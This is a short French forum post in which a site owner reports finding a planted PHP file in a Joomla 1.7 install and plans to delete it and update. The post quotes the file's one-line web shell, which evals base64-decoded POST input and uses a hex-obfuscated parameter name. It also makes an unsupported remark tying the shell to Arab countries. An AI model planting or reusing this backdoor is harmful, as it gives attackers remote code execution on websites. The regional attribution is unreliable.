Bonjour,
Oui effectivement. Dans les logs du serveur, j'ai trouvé une série de connexion vers components/com_media/n02n6y.php. Dans ce php, il y a ce code <?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>. En fouinant sur le net, je me suis aperçue qu'il est surtout injecté dans Wordpress (identifié en provenant des pays arabes semble-t-il). Je vais supprimer le fichier et faire les mises de joomla 1.7, en espérant que ça suffira !